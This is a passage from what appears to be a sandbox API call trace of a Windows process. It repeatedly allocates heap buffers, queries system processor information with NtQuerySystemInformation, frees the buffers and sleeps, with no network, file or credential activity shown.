lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0262.424] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0262.424] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0262.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c518 [0262.425] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c518, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c518, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.425] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c518 | out: hHeap=0x2560000) returned 1 [0262.425] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.426] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.426] Sleep (dwMilliseconds=0x110) [0262.474] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0262.474] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0262.477] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a4d8 [0262.478] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a4d8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a4d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.478] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a4d8 | out: hHeap=0x2560000) returned 1 [0262.478] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0262.478] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.479] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0262.479] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0262.479] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.479] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0262.479] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.480] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.480] Sleep (dwMilliseconds=0x110) [0262.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0262.501] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.502] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0262.502] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0262.502] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0262.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c220 [0262.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c220, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c220, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.503] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c220 | out: hHeap=0x2560000) returned 1 [0262.503] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cce8 [0262.503] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cce8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cce8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cce8 | out: hHeap=0x2560000) returned 1 [0262.504] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.504] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.504] Sleep (dwMilliseconds=0x110) [0262.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0262.526] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.526] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0262.526] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a6e0 [0262.526] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a6e0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.527] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a6e0 | out: hHeap=0x2560000) returned 1 [0262.527] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c058 [0262.527] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c058, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c058, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.527] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c058 | out: hHeap=0x2560000) returned 1 [0262.528] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0262.529] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.529] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0262.529] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.530] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.530] Sleep (dwMilliseconds=0x110) [0262.551] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d718 [0262.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d718, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d718, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.552] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d718 | out: hHeap=0x2560000) returned 1 [0262.552] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0262.552] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0262.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0262.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.553] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0262.553] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0262.553] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0262.554] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.554] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.554] Sleep (dwMilliseconds=0x110) [0262.568] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0262.568] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.569] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0262.574] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0262.574] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.575] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0262.576] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0262.576] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0262.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c900 [0262.577] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c900, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c900, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.577] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c900 | out: hHeap=0x2560000) returned 1 [0262.577] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.578] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.578] Sleep (dwMilliseconds=0x110) [0262.591] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0262.591] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.592] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0262.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0262.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0262.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b8a0 [0262.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b8a0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b8a0 | out: hHeap=0x2560000) returned 1 [0262.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0262.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0262.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.594] Sleep (dwMilliseconds=0x110) [0262.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d8a0 [0262.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d8a0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d8a0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.611] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d8a0 | out: hHeap=0x2560000) returned 1 [0262.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285abc0 [0262.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285abc0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285abc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285abc0 | out: hHeap=0x2560000) returned 1 [0262.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0262.612] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.613] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0262.613] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0262.613] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0262.614] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.614] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.614] Sleep (dwMilliseconds=0x110) [0262.634] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d600 [0262.634] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d600, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d600, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.634] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d600 | out: hHeap=0x2560000) returned 1 [0262.634] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0262.634] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.635] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0262.635] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb98 [0262.635] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb98, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb98, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.635] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb98 | out: hHeap=0x2560000) returned 1 [0262.635] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0262.635] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.636] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0262.636] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.636] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.636] Sleep (dwMilliseconds=0x110) [0262.647] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d558 [0262.647] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d558, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d558, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d558 | out: hHeap=0x2560000) returned 1 [0262.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a610 [0262.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a610, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a610, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.648] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a610 | out: hHeap=0x2560000) returned 1 [0262.648] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0262.648] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0262.649] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d008 [0262.649] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d008, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d008, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d008 | out: hHeap=0x2560000) returned 1 [0262.649] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.649] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.649] Sleep (dwMilliseconds=0x110) [0262.837] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d590 [0262.837] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d590, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d590, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.855] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d590 | out: hHeap=0x2560000) returned 1 [0262.855] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0262.855] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.856] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0262.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bd60 [0262.856] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bd60, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bd60, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.856] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bd60 | out: hHeap=0x2560000) returned 1 [0262.856] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0262.857] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.857] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0262.857] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.858] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.858] Sleep (dwMilliseconds=0x110) [0262.885] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0262.885] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0262.886] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0262.886] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.886] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0262.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b5a8 [0262.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b5a8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b5a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b5a8 | out: hHeap=0x2560000) returned 1 [0262.891] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0262.891] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.891] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0262.892] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.892] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.892] Sleep (dwMilliseconds=0x110) [0262.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d670 [0262.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d670, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d670, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.905] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d670 | out: hHeap=0x2560000) returned 1 [0262.905] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a9b8 [0262.905] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a9b8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a9b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a9b8 | out: hHeap=0x2560000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0262.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0262.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0262.906] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0262.906] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0262.906] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0262.907] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0262.907] Sleep (dwMilliseconds=0x110) [0263.079] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d830 [0263.079] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d830, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d830, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.080] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d830 | out: hHeap=0x2560000) returned 1 [0263.080] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a880 [0263.080] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a880, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a880, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.081] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a880 | out: hHeap=0x2560000) returned 1 [0263.081] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bdf8 [0263.081] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bdf8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bdf8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.082] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bdf8 | out: hHeap=0x2560000) returned 1 [0263.082] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0263.082] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0263.083] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0263.083] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0263.084] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0263.084] Sleep (dwMilliseconds=0x110) [0263.094] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0263.094] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0263.095] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0263.095] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0263.095] NtQuerySystemInformation (in: SystemInformationClass=0x8, 